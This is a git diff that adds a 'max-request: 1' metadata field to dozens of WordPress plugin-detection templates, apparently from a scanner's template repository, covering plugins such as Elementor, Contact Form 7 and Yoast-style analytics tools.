index 85965337cb..ac80e4f31b 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
+    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 33d903a1b4..15d7a24755 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 3c6f8f287b..40ccc15b27 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
+    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index c3b630cde2..1fad3cee08 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
+    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index 5c8ce709b6..ebe4ee41a7 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
+    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index aea47b9e84..5c32110e0e 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
+    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 78c584c388..09c2e2f360 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
+    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 2c80d09c27..1a2e8beb3e 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
+    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 4b1b3a8754..706145493c 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index 06ad83bdf7..cf6a6ee635 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index b20666268f..c039765929 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
+    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index b2a097bfe7..a2c92dff4b 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index c71fa258af..41b5d6c854 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
+    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index 5a98e67597..cca31cc3a9 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
+    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index 4463174203..ff9c0a49ce 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
+    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index cfac0b961b..a76d3306bb 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
+    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 846761f2f7..2249681b6d 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
+    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index 0def6e61ca..b5389b27c9 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
+    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 5c5decc127..00d183f507 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
+    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index a8229a338e..451e1daef1 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index 6559e64dce..af30ca76b6 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index a4368b8aa6..93823466d4 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index ec119e762a..e224283ecd 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
+    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index b7ec7576a3..9af8df08a7 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
+    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index c42d679973..d4081474c3 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
+    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index fc44375947..bcbc0707fb 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
+    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index a1616c1741..8b23832297 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index 6cfb8bc272..f0c3e4bc63 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
+    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index 9caaa53263..eab4a0d725 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
+    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 5e6b557952..74c172ac94 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
+    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index c5a665e6f7..f5a63a2ed2 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
+    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index a8b56b5df0..25ca7328ef 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
+    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index 4e20e57107..cb1db5bee6 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
+    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index 6f6a416595..a3207ea16a 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2dd0ef57b5..2a4b772078 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
+    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 11942f4fa4..366205085d 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
+    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 87c2aeb4bd..598f08ce88 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
+    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 3696eefbf7..42cdfb4475 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
+    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index 8bab0a9c3e..a1af263dbd 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
+    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index affd270123..19265f910e 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index 1e6a62e23b..c21d414695 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
+    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 980265f531..91c89d0ad8 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
+    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index daf205789d..539d9f7cec 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
+    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index 22bfa3ffe2..f4123bb594 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
+    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 7ed171d662..254f916291 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index ad238445fc..8074ac337e 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index 7161671960..b9de0ee313 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
+    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 2678f603c6..7b0f188ff7 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
+    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 20d947a5d1..898e4de56d 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
+    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 22ee97b51f..4a76856a69 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
+    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index 3f4c6c8936..b321ca63eb 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index fa1bb64115..2b42c9f80c 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
+    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index da63d1cbf6..dbea07a6da 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index f94e7f6494..17a8f220cf 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
